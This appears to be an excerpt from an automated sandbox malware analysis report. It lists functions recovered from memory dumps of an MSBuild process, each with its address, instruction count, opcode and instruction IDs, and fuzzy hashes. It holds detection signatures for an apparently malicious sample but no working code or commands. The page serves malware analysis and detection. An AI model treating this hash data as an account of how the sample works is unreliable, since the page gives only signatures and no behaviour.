Function 0599EA40 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8084811db422a80fb2fa0fc7bc51c77f1a8c5298f84603c2d71fc057be0eeb
Instruction ID: de52dad52d2a21a03a024a8c725a3db4062c8771d11be61d3f92bab6bdfa68af
Opcode Fuzzy Hash: ee8084811db422a80fb2fa0fc7bc51c77f1a8c5298f84603c2d71fc057be0eeb
Instruction Fuzzy Hash: 90F054363402146FCB14AB5CDC48F6F77ABDBD8611F59855AF9048B381CA71EC0287D4

Function 0592C698 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b0c3854adcbe550efa38cc36a58ce21a6dc82033917e52b257d4ffe2063916
Instruction ID: d83e76a95109346550e9760b717cd211ff33f7f6239f7b4288f76fe26f1f06a6
Opcode Fuzzy Hash: a3b0c3854adcbe550efa38cc36a58ce21a6dc82033917e52b257d4ffe2063916
Instruction Fuzzy Hash: CEF0FE353106114FD748DA3ED45486A77EBAFCE65135580B9E606CB374EEB1DC028654

Function 05923EC8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3a97a2e9ae6fad0ba9e48f1253ad21d56d4311e085654b966d1d0a2ab17fb13
Instruction ID: f012ec1f69840f402be7887e05d52910019235e256090c5b9bfe96850280c0cf
Opcode Fuzzy Hash: b3a97a2e9ae6fad0ba9e48f1253ad21d56d4311e085654b966d1d0a2ab17fb13
Instruction Fuzzy Hash: 95F090313102114BC658EB6DE45096E77EBEBC96213508929E80A8B784EF30ED0697E1

Function 00D0D920 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1521915253.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d0d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 577550f9853d625ee1d1659c3ff610144064254f3355d09c303bb9839428e395
Instruction ID: 0ecab831148e6151f5ff464ac569c36b55147617dcd5541811b90589b501ae4b
Opcode Fuzzy Hash: 577550f9853d625ee1d1659c3ff610144064254f3355d09c303bb9839428e395
Instruction Fuzzy Hash: 9DF0CD71409344AEE7108E06DC84B62FF98EB51734F28C45AED4C5E2C2C279A844CAB1

Function 0592E941 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c680551101880251df3e47ca4f4137cfdcdda102eaf2add4d0082a480f58350d
Instruction ID: 7ab7564d52ad15492512fadfedadf1447dec096e565b7371800f3da20d9fea32
Opcode Fuzzy Hash: c680551101880251df3e47ca4f4137cfdcdda102eaf2add4d0082a480f58350d
Instruction Fuzzy Hash: 08F050746047228BE701AB68B8497383F37FBD0220F18812BF94287200CF3C9801D740

Function 059263C9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5470ba513f34e62965696544d92b49ef150a380eed4020263d4c704d421b8886
Instruction ID: ce8740da19ec991e096da8383036b11856b45d29153563e0b9162be63ded5f8c
Opcode Fuzzy Hash: 5470ba513f34e62965696544d92b49ef150a380eed4020263d4c704d421b8886
Instruction Fuzzy Hash: FEF0E232340310ABD7208B58EC05F667FEAFB85720F258126F7158B1A5DBB2E8018784

Function 05991DFF Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c441f4aec6d51db14c17092b395c2795aeb865353b0d3b8dcbb2c672d6756ea3
Instruction ID: e519446fdec199f6c6d7edad735fe0d8fd0b0e1b12e290e907147d642fb9cadb
Opcode Fuzzy Hash: c441f4aec6d51db14c17092b395c2795aeb865353b0d3b8dcbb2c672d6756ea3
Instruction Fuzzy Hash: 8CF06D763002119FC708EB3CD984A59B7A6FFC925135406B8D549D775ADB30AC15CB90

Function 05994AB1 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773d5922086ac7f4b5ec988257d766a16324fcad7800c6a9e75d112816dcd271
Instruction ID: 7258bca51e9646f537ec70ea1922fa47afc0525308b93a1c195e8c1c434fc34e
Opcode Fuzzy Hash: 773d5922086ac7f4b5ec988257d766a16324fcad7800c6a9e75d112816dcd271
Instruction Fuzzy Hash: 30F0A7323041265F9F06D95D9C45FBF7BAEFB84514B08402AF408C7641DF70D8028795

Function 059906C2 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e47eb7c2dff17c771b3b4d934ec0f6c400d2ac843aaa26e4408fbd04872554
Instruction ID: 6534cd7da4bf95716d75d36ec1212d4cc497590c61fe87901475dce5801a250a
Opcode Fuzzy Hash: 37e47eb7c2dff17c771b3b4d934ec0f6c400d2ac843aaa26e4408fbd04872554
Instruction Fuzzy Hash: E6F05273B051208FDF5CA65D9588A3E6393BFC4620B4A026AC992CB226CF20CC02C381

Function 059254F8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8a0d100cd38696840643bb2d20cd10802669384269f3c2dfb5fc8f90b24eea
Instruction ID: 2ecbfc777abd346b548103c9e00bfe2697e933c9d7d946b89ea609ae1b9527e5
Opcode Fuzzy Hash: 2c8a0d100cd38696840643bb2d20cd10802669384269f3c2dfb5fc8f90b24eea
Instruction Fuzzy Hash: A3F0BE30614322DFDB24DA22D400EB3BBFBFB80204F46882CE4424A918DB71F885CB80

Function 059256E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d204ec8c8b18fae0dbddef7a73892b2ae44f524cf905aba16753792adb92fca8
Instruction ID: 1a6332db60d578ee349b4b5b18af1f862401a6610c49b3195da9a51dac88fa0d
Opcode Fuzzy Hash: d204ec8c8b18fae0dbddef7a73892b2ae44f524cf905aba16753792adb92fca8
Instruction Fuzzy Hash: 51F0E2392001029FC704DF0DD480E997BAAFBC8310B4AC06AF9008B234DB30E9648B90

Function 05992271 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a04123dcbe3997756679da70aa6c054cad48a434ddf39e018e2bcb75675c19
Instruction ID: 147e105e6a702981b7a3903258d4e79358fc283dd00641975cec2501bf4a65fa
Opcode Fuzzy Hash: b7a04123dcbe3997756679da70aa6c054cad48a434ddf39e018e2bcb75675c19
Instruction Fuzzy Hash: 7AE0E53A30C345BBDF0C9F9DA94547B7FADEBC712234C01BAE806C3242CA15DD0486A1

Function 0592C641 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec69a745f67ea09769a9cdccbed67b41fd0a195fc28c598911ca779a1ddbc85e
Instruction ID: 13b79944f5405cc59890f9c9b7c4bcc80ec3f5b4f6ae31458db21da04293de02
Opcode Fuzzy Hash: ec69a745f67ea09769a9cdccbed67b41fd0a195fc28c598911ca779a1ddbc85e
Instruction Fuzzy Hash: 0BF01C72205A66AFD319CB5DA845D16BFA9FB89750B14816AF818C7206CB31EC41CBA4

Function 0599EA50 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 237ef5fcb2081e5fbbac42a667105af725fb33f73820cfb7cc87ac757ef2c7e7
Instruction ID: b2d90231a306701de0842bf3101f9819b735cf5c891939568ca1a6cf8ebe4b52
Opcode Fuzzy Hash: 237ef5fcb2081e5fbbac42a667105af725fb33f73820cfb7cc87ac757ef2c7e7
Instruction Fuzzy Hash: 04F03735300204AFCB14AB59D844E6B77BBDBC9710B14C519F9048B344CA71EC0287D0

Function 05994480 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a9b4148da5cbdc9c323af7bffadd1e26ab2803bd4ac53f70f93e6c16f9d989
Instruction ID: 0a7f148201a3da96b4fea83e63e59f87626e1ceec3a75748877d4d0972cc2421
Opcode Fuzzy Hash: c3a9b4148da5cbdc9c323af7bffadd1e26ab2803bd4ac53f70f93e6c16f9d989
Instruction Fuzzy Hash: D5E0ED353005148FC718966EE444C5AF7DEEFC966531940A6E209CB731DA61EC018660

Function 05998F48 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3ecdc5bf71db36ab17c5ccf8b6c9d552055e43f3ebb9567935c6acf6d56b32
Instruction ID: 4acbe02afe3c09d0e97d6201d58adb8e352f1d09026af69922628fef127e53c9
Opcode Fuzzy Hash: 4d3ecdc5bf71db36ab17c5ccf8b6c9d552055e43f3ebb9567935c6acf6d56b32
Instruction Fuzzy Hash: 6AE09B26608BB40DEF36556C20143B2BFEE5B43264F0C499DE4CF82582D565D50887D0

Function 0592C650 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41f98a2174dd24a259f438c183eafcbe24429029de4fece9d59cd8f72dd3e49
Instruction ID: 4dd5a208b8972e43fe72bee41920982fe35187bc2e42d53e5dccde9cfdc811e1
Opcode Fuzzy Hash: a41f98a2174dd24a259f438c183eafcbe24429029de4fece9d59cd8f72dd3e49
Instruction Fuzzy Hash: 48E01A76604626AFD315CE59E885C5ABBEDFB89765710812AF818C7304CB72EC41CBE4

Function 0592569B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2558049bebacdfbdc14175d203dd4a4e0f74aa402159604f2d111af80d34e5
Instruction ID: d6bed9aad28c3ec2eed79f2ad9b29c11af6182ddb98e186268f662128e82dd2c
Opcode Fuzzy Hash: 5d2558049bebacdfbdc14175d203dd4a4e0f74aa402159604f2d111af80d34e5
Instruction Fuzzy Hash: 26E01A7310C210AFD344EE24EC45BABB7E9EFA5320F15C92EA448C6284EB31D841C6A1

Function 05925DC0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33268bc196a0f9004f5a40fe90b98e8e87743b5fa6f8eb891053b826c337946b
Instruction ID: 81a2eb116156796dac30f564c28cc0a874a1cdf58a823ebf0c105dcb907cecf2
Opcode Fuzzy Hash: 33268bc196a0f9004f5a40fe90b98e8e87743b5fa6f8eb891053b826c337946b
Instruction Fuzzy Hash: 44E0C2312007268BD610A26AEC45BA77B9AEFC4222F048526A80AC7314DF68F94083C0

Function 05990700 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d45bd0c018789e0573fe31893c1e3f69d7df1a1a5b95df0026f11fded0c7773
Instruction ID: 10d17889f4720049b49b514c72015b2e159f770f07f958c2ac2259aeaf699b52
Opcode Fuzzy Hash: 8d45bd0c018789e0573fe31893c1e3f69d7df1a1a5b95df0026f11fded0c7773
Instruction Fuzzy Hash: BAE0C2BB7141104FDF85766CB4587AAABA2DBE4172F080073E681D7716CA20C802C390

Function 0592F83C Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44776bcbfe50a42f8fefb263fe2adfab702b2441e49c9e1f99be6dec3889b8fd
Instruction ID: cd9daf2dcd95f33d0c99eb9810a4c1de531f7f04ab2488d7cfd318dfd7664600
Opcode Fuzzy Hash: 44776bcbfe50a42f8fefb263fe2adfab702b2441e49c9e1f99be6dec3889b8fd
Instruction Fuzzy Hash: D4E0EB7370E2900FE306C268ACC006D7FF0EAA26013884AEBD243CB331E614EC0AA310

Function 05927E31 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8fa2e43275b49add1676828770c93167967fb3d43a98b6e5da4a6d4ed8ad97
Instruction ID: 25a8c1dc7cdcde3f84a4533cbfb579d1512f87e3f8c93de2ea206c880da8a686
Opcode Fuzzy Hash: 2e8fa2e43275b49add1676828770c93167967fb3d43a98b6e5da4a6d4ed8ad97
Instruction Fuzzy Hash: 06E0D837314200ABC7115F989804C6A7F67FB882217088476F68147581CA7058149790

Function 05927E40 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aabcbf484bbe12a9a1c3f9202c48ab20a70040692a2e8e66ca28c25220d5231
Instruction ID: 367f436fc655dd4c723d4846919b0e521edb599a1b81430b57c7cdd0d5a172f7
Opcode Fuzzy Hash: 2aabcbf484bbe12a9a1c3f9202c48ab20a70040692a2e8e66ca28c25220d5231
Instruction Fuzzy Hash: 4FE0C233310204BB8B15AE9AA804C6BBF6FEBD8620304C02AFA4183640CE71A81597A0

Function 05925DD0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31285f9f6371f95e1ffe02d04043cff1559775d8b5a795b3a21f6f390704e214
Instruction ID: b772331c19f352abd289de51890107489e4bf8b1f263cda1228c5b924fb48fa3
Opcode Fuzzy Hash: 31285f9f6371f95e1ffe02d04043cff1559775d8b5a795b3a21f6f390704e214
Instruction Fuzzy Hash: 47D0A7312007264BDA14D72EE8444AB7BDEFFC4621700842AE85A8B614DF60F94187C0

Function 05994450 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8dcb3de830e7b11770680cfcd9164dade5fd192575d0715a06e3dc2d153a33c
Instruction ID: 917f2723feb1d8511af907cb6f2c20b2161b212d0bd0959e17f276b22fb369e1
Opcode Fuzzy Hash: d8dcb3de830e7b11770680cfcd9164dade5fd192575d0715a06e3dc2d153a33c
Instruction Fuzzy Hash: 8BC012322A42188FC302AA28DC599883BB8AE4690438A00D6E508CB623D611E8048A80

Function 0592FE51 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cdf00482a2448f87c602d5cc390b84f0d6077c250c4a7fa097a78f94883931a
Instruction ID: 60368c354aa0c629c22758e2026a199bbf6b8a405e93d3e37160443c76396b41
Opcode Fuzzy Hash: 3cdf00482a2448f87c602d5cc390b84f0d6077c250c4a7fa097a78f94883931a
Instruction Fuzzy Hash: 90D01230258A498FC309CB6CD888E88B7E8FF45619B0A42E5E208CB373C721FD108AC0

Function 0592EA28 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cecba92ff7579b5046f670a989318574b5d76d00817b1589afc4b8b75f69b051
Instruction ID: 9cde822a73cec8724feb5473aa2b834d2fca7b55cfa91bd8fa74f68ddfb1aa49
Opcode Fuzzy Hash: cecba92ff7579b5046f670a989318574b5d76d00817b1589afc4b8b75f69b051
Instruction Fuzzy Hash: D8C0803500C7495FCB04E734F8C6F947B2C9F40109F8D41F9E9094A506DE542854C745

Function 05923720 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7980cd20dc7513daab9e23177c92ba0fc0af50c92c09f12d34805d86d5ca347c
Instruction ID: 318bd4b52298653754989f2cbf732ff336befbd566f863af53fa654f2be27bdd
Opcode Fuzzy Hash: 7980cd20dc7513daab9e23177c92ba0fc0af50c92c09f12d34805d86d5ca347c
Instruction Fuzzy Hash: 1FC092B2A38900EFEB016FA6EE2BB757F33F758700F025906B2C9401A1CA710460DB92

Function 0592EA00 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e06c73b6e493f1d13a2013a23c91bfa5d56387b1fe2322cabdf619f0b7c8cd2
Instruction ID: b95da461b7b7933142d1c41adda84087c0c6b9967de78154e0980bd04f95e8de
Opcode Fuzzy Hash: 0e06c73b6e493f1d13a2013a23c91bfa5d56387b1fe2322cabdf619f0b7c8cd2
Instruction Fuzzy Hash: 96C08C2060C5814BDA05DB60C8E6B2537748B42304F8D40ADC2058F392C9109800C741

Function 0592EE00 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5a3a57e6b997c522b9a76c91ee499c62f87cf699ae64d85087a2cbe006e8f8
Instruction ID: 20a774ce62409162a58476e80c39be5c63526bb827de22f2ebfe836e330534b9
Opcode Fuzzy Hash: ee5a3a57e6b997c522b9a76c91ee499c62f87cf699ae64d85087a2cbe006e8f8
Instruction Fuzzy Hash: C5C08CA700E2828FC74582268C68D282B20DA7220878F419A865186143DA14481ECB21

Function 0592FE60 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071606f9ac93cf8249539b6597799d487efc42b6685d35dff925687fe447caac
Instruction ID: 8a77fed616b47a4429056de24ea6752656ed7f869c61f96983e84a7b1b2b211a
Opcode Fuzzy Hash: 071606f9ac93cf8249539b6597799d487efc42b6685d35dff925687fe447caac
Instruction Fuzzy Hash: 74B092341506088F82009B58E448C4473E8AB08A253114090E1088B232C621FC408A40

Function 0592EA38 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b5c8b6f2fd3df8715ea94be0593b45c20fa17342702559441b868ea4d79efb
Instruction ID: 1767e875aa040a16a6ac810a4a2f37969f9dfb2698eb557662e97f590b3cc678
Opcode Fuzzy Hash: 95b5c8b6f2fd3df8715ea94be0593b45c20fa17342702559441b868ea4d79efb
Instruction Fuzzy Hash: A0B01234008B1E4FC6407764F405D043B1CA6805097808211F80D091095F6539104785

Function 05994460 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de847a0528bbc7a7393f5e98ae606a4b181b211cc876a90962d2b0a83971d2f4
Instruction ID: 03308a7015262dc60266e0276a8c8d94ddd012c5f0dd28833018c3f95f56e0d9
Opcode Fuzzy Hash: de847a0528bbc7a7393f5e98ae606a4b181b211cc876a90962d2b0a83971d2f4
Instruction Fuzzy Hash: 7EB092341602088F82009B59D448C0077ECAF08A0434140D0E1088B632C621F8008A40

Function 059906D0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

Non-executed Functions

Function 059D3A7E Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

buz, xrefs: 059D3AAD
buz, xrefs: 059D3ACD

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID: buz$buz
API String ID: 0-3795138944
Opcode ID: 40cf2b7fd798b7a6c20e3fbfeed1c88576c5c18aa9d3437327d0e01c3c475c12
Instruction ID: ff7af215130ebc6d9c6d96ddffd7c256537ebf04fcaeb2508b11bf583b839006
Opcode Fuzzy Hash: 40cf2b7fd798b7a6c20e3fbfeed1c88576c5c18aa9d3437327d0e01c3c475c12
Instruction Fuzzy Hash: 6E41FBB5D003488FDB10CFA9D985BADFBF5BB09301F20952AE815BB280D7789885CF56

Function 059D3A88 Relevance: 2.6, Strings: 2, Instructions: 120COMMON

Download Yara Rule

Strings

buz, xrefs: 059D3AAD
buz, xrefs: 059D3ACD

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID: buz$buz
API String ID: 0-3795138944
Opcode ID: 3152bbb2245388498e46b79f857d08aef87a273274c7010fbe1fe77b539bd688
Instruction ID: db143c3b2911486a17351496ef0f58b2645f1dd55d85c97ca6416d0c74d6a9cf
Opcode Fuzzy Hash: 3152bbb2245388498e46b79f857d08aef87a273274c7010fbe1fe77b539bd688
Instruction Fuzzy Hash: B9410DB5D043489FDB10CFA9D985BADFBF5BB09300F20952AE815AB240D7789845CF56

Function 05926FE8 Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa6a702da23b1585135515a4c39ddec3c3cee64cdf93406cb8c58905584d553c
Instruction ID: 9a272f44ee492307d7060aa8f568ac54a74e3500471340c39817737bc8d137e2
Opcode Fuzzy Hash: fa6a702da23b1585135515a4c39ddec3c3cee64cdf93406cb8c58905584d553c
Instruction Fuzzy Hash: F0620FB06103009BE748EF58D49872A7AE6EB84308F64C55DD00D9F3D6DFB6D90B8BA5

Function 05926FF8 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c92d18d46fc6d3019be620dbb9e8e77a3be0ed1a4d79c60dca407b944c5813
